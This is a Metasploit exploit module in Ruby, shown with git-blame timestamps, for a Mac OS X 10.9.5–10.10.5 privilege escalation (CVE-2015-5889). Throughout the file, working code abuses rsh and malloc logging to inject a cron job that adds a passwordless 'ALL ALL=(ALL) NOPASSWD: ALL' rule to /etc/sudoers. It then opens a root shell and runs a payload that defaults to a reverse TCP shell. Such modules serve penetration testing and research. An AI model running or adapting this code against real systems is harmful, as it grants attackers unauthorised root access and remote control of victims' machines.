2015-10-16 21:39:07 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Local
|
2015-10-16 21:39:07 +00:00
|
|
|
|
|
|
|
Rank = NormalRanking
|
|
|
|
|
|
|
|
include Msf::Post::OSX::System
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
This module writes to the sudoers file without root access by exploiting rsh and malloc log files.
|
|
|
|
Makes sudo require no password, giving access to su even if root is disabled.
|
|
|
|
Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
|
|
|
|
},
|
|
|
|
'Author' => [
|
|
|
|
'rebel', # Vulnerability discovery and PoC
|
2015-10-16 21:54:34 +00:00
|
|
|
'shandelman116' # Copy/paste AND translator monkey
|
2015-10-16 21:39:07 +00:00
|
|
|
],
|
|
|
|
'References' => [
|
2015-10-19 02:10:47 +00:00
|
|
|
['EDB', '38371'],
|
2015-10-18 09:13:03 +00:00
|
|
|
['CVE', '2015-5889']
|
2015-10-16 21:39:07 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Oct 1 2015',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
# Want to ensure that this can be used on Python Meterpreter sessions as well
|
|
|
|
'Platform' => ['osx', 'python'],
|
2016-10-27 21:16:05 +00:00
|
|
|
'Arch' => [ARCH_X64, ARCH_PYTHON],
|
2015-10-16 21:39:07 +00:00
|
|
|
'SessionTypes' => ['shell', 'meterpreter'],
|
|
|
|
'Privileged' => true,
|
|
|
|
'Targets' => [
|
|
|
|
['Mac OS X 10.9.5-10.10.5', {}]
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DefaultOptions' => {
|
|
|
|
'PAYLOAD' => 'osx/x64/shell_reverse_tcp'
|
|
|
|
}
|
|
|
|
))
|
|
|
|
|
2015-10-18 09:13:03 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
|
|
|
|
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
|
|
|
|
], self.class
|
|
|
|
)
|
2015-10-16 21:39:07 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
# Check OS
|
|
|
|
os_check
|
|
|
|
|
|
|
|
# Check if crontab file existed already so it can be restored at cleanup
|
|
|
|
if file_exist? "/etc/crontab"
|
2015-10-22 05:53:32 +00:00
|
|
|
@crontab_original = read_file("/etc/crontab")
|
2015-10-16 21:39:07 +00:00
|
|
|
else
|
2015-10-22 05:53:32 +00:00
|
|
|
@crontab_original = nil
|
2015-10-16 21:39:07 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Writing payload
|
2016-10-27 21:16:05 +00:00
|
|
|
if payload.arch.include?(ARCH_X64)
|
2015-10-16 21:39:07 +00:00
|
|
|
vprint_status("Writing payload to #{payload_file}.")
|
|
|
|
write_file(payload_file, payload_source)
|
|
|
|
vprint_status("Finished writing payload file.")
|
2015-10-26 06:38:48 +00:00
|
|
|
register_file_for_cleanup(payload_file)
|
2016-10-27 21:16:05 +00:00
|
|
|
elsif payload.arch.include?(ARCH_PYTHON)
|
2015-10-16 21:39:07 +00:00
|
|
|
vprint_status("No need to write payload. Will simply execute after exploit")
|
|
|
|
vprint_status("Payload encodeded is #{payload.encoded}")
|
|
|
|
end
|
|
|
|
|
|
|
|
# Run exploit
|
|
|
|
sploit
|
|
|
|
|
|
|
|
# Execute payload
|
|
|
|
print_status('Executing payload...')
|
2016-10-27 21:16:05 +00:00
|
|
|
if payload.arch.include?(ARCH_X64)
|
2015-10-26 06:38:48 +00:00
|
|
|
cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown")
|
2016-10-27 21:16:05 +00:00
|
|
|
elsif payload.arch.include?(ARCH_PYTHON)
|
2015-10-26 06:38:48 +00:00
|
|
|
cmd_exec("python -c \"#{payload.encoded}\" & disown")
|
2015-10-16 21:39:07 +00:00
|
|
|
end
|
2015-10-26 06:38:48 +00:00
|
|
|
vprint_status("Finished executing payload.")
|
2015-10-16 21:39:07 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def os_check
|
|
|
|
# Get sysinfo
|
|
|
|
sysinfo = get_sysinfo
|
|
|
|
# Make sure its OS X (Darwin)
|
|
|
|
unless sysinfo["Kernel"].include? "Darwin"
|
|
|
|
print_warning("The target system does not appear to be running OS X!")
|
|
|
|
print_warning("Kernel information: #{sysinfo['Kernel']}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
# Make sure its not greater than 10.5 or less than 9.5
|
|
|
|
version = sysinfo["ProductVersion"]
|
|
|
|
minor_version = version[3...version.length].to_f
|
|
|
|
unless minor_version >= 9.5 && minor_version <= 10.5
|
|
|
|
print_warning("The target version of OS X does not appear to be compatible with the exploit!")
|
|
|
|
print_warning("Target is running OS X #{sysinfo['ProductVersion']}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def sploit
|
2015-10-26 06:38:48 +00:00
|
|
|
user = cmd_exec("whoami").chomp
|
|
|
|
vprint_status("The current effective user is #{user}. Starting the sploit")
|
2015-10-16 21:39:07 +00:00
|
|
|
# Get size of sudoers file
|
|
|
|
sudoer_path = "/etc/sudoers"
|
|
|
|
size = get_stat_size(sudoer_path)
|
|
|
|
|
|
|
|
# Set up the environment and command for spawning rsh and writing to crontab file
|
|
|
|
rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"
|
|
|
|
rb_cmd = "ruby -e '#{rb_script}'"
|
|
|
|
|
|
|
|
# Attempt to execute
|
|
|
|
print_status("Attempting to write /etc/crontab...")
|
|
|
|
cmd_exec(rb_cmd)
|
|
|
|
vprint_status("Now to check whether the script worked...")
|
|
|
|
|
|
|
|
# Check whether it worked
|
2016-09-28 22:15:01 +00:00
|
|
|
crontab = read_file("/etc/crontab")
|
2015-10-16 21:39:07 +00:00
|
|
|
vprint_status("Reading crontab yielded the following response: #{crontab}")
|
2015-10-22 05:53:32 +00:00
|
|
|
unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
|
2015-10-16 21:39:07 +00:00
|
|
|
vprint_error("Bad news... it did not write to the file.")
|
|
|
|
fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")
|
|
|
|
end
|
|
|
|
|
|
|
|
print_good("Succesfully wrote to crontab file!")
|
|
|
|
|
|
|
|
# Wait for sudoers to change
|
|
|
|
new_size = get_stat_size(sudoer_path)
|
2015-10-26 06:38:48 +00:00
|
|
|
print_status("Waiting for sudoers file to change...")
|
2015-10-16 21:39:07 +00:00
|
|
|
|
2015-10-26 06:38:48 +00:00
|
|
|
# Start timeout block
|
|
|
|
begin
|
|
|
|
Timeout.timeout(datastore['WaitTime']) {
|
|
|
|
while new_size <= size
|
|
|
|
Rex.sleep(1)
|
|
|
|
new_size = get_stat_size(sudoer_path)
|
|
|
|
end
|
|
|
|
}
|
|
|
|
rescue Timeout::Error
|
|
|
|
fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.")
|
2015-10-16 21:39:07 +00:00
|
|
|
end
|
|
|
|
print_good("Sudoers file has changed!")
|
|
|
|
|
|
|
|
# Confirming root access
|
2015-10-26 06:38:48 +00:00
|
|
|
print_status("Attempting to start root shell...")
|
|
|
|
cmd_exec("sudo -s su")
|
|
|
|
user = cmd_exec("whoami")
|
2015-10-16 21:39:07 +00:00
|
|
|
unless user.include? "root"
|
|
|
|
fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}")
|
|
|
|
end
|
|
|
|
print_good("Success! Acquired root access!")
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_stat_size(file_path)
|
|
|
|
cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'"
|
|
|
|
response = cmd_exec(cmd)
|
|
|
|
vprint_status("Response to stat size query is #{response}")
|
|
|
|
begin
|
|
|
|
size = Integer(response)
|
|
|
|
return size
|
|
|
|
rescue ArgumentError
|
|
|
|
fail_with(Failure::UnexpectedReply, "Could not get stat size!")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def payload_source
|
2016-10-27 21:16:05 +00:00
|
|
|
if payload.arch.include?(ARCH_X64)
|
2015-10-16 21:39:07 +00:00
|
|
|
return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
|
2016-10-27 21:16:05 +00:00
|
|
|
elsif payload.arch.include?(ARCH_PYTHON)
|
2015-10-16 21:39:07 +00:00
|
|
|
return payload.encoded
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def payload_file
|
|
|
|
@payload_file ||=
|
|
|
|
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
|
|
|
|
end
|
|
|
|
|
2015-10-22 05:53:32 +00:00
|
|
|
def cleanup
|
2015-10-26 06:38:48 +00:00
|
|
|
vprint_status("Starting the cron restore process...")
|
2015-10-22 05:53:32 +00:00
|
|
|
super
|
2015-10-16 21:39:07 +00:00
|
|
|
# Restore crontab back to is original state
|
|
|
|
# If we don't do this, then cron will continue to append the no password rule to sudoers.
|
2015-10-22 05:53:32 +00:00
|
|
|
if @crontab_original.nil?
|
2015-10-16 21:39:07 +00:00
|
|
|
# Erase crontab file and kill cron process since it did not exist before
|
2015-10-26 06:38:48 +00:00
|
|
|
vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.")
|
|
|
|
rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?")
|
|
|
|
if rm_ret.chomp.to_i == 0
|
|
|
|
vprint_good("Successfully removed crontab file!")
|
|
|
|
else
|
|
|
|
print_warning("Could not remove crontab file.")
|
|
|
|
end
|
2015-10-18 09:13:03 +00:00
|
|
|
Rex.sleep(1)
|
2015-10-26 06:38:48 +00:00
|
|
|
kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?")
|
|
|
|
if kill_ret.chomp.to_i == 0
|
|
|
|
vprint_good("Succesfully killed cron!")
|
|
|
|
else
|
|
|
|
print_warning("Could not kill cron process.")
|
|
|
|
end
|
2015-10-16 21:39:07 +00:00
|
|
|
else
|
|
|
|
# Write back the original content of crontab
|
|
|
|
vprint_status("Restoring crontab file back to original contents. No need for it anymore.")
|
2015-10-26 06:38:48 +00:00
|
|
|
cmd_exec("echo '#{@crontab_original}' > /etc/crontab")
|
2015-10-16 21:39:07 +00:00
|
|
|
end
|
2015-10-26 06:38:48 +00:00
|
|
|
vprint_status("Finished the cleanup process.")
|
2015-10-16 21:39:07 +00:00
|
|
|
end
|
|
|
|
end
|